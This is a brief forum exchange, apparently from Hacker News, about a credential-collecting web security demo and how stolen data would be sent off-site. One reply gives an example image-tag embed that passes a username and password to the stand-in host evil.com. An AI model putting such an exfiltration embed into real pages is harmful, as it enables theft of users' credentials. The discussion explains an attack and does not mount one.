|
|
|
|
|
by TedDoesntTalk
1795 days ago
|
|
I don’t see the vulnerability. His demo collects credentials then displays them ... all on the same domain websecurity.dev So what? What am I missing? How will he exfiltrate the data? With JS that posts it to another domain? |
|
Exactly. Alternatively, you can also use embeds, for example `<img src="https://evil.com/$user/$password" >`.
If you have your code running and the credentials, exfiltration is no longer a problem.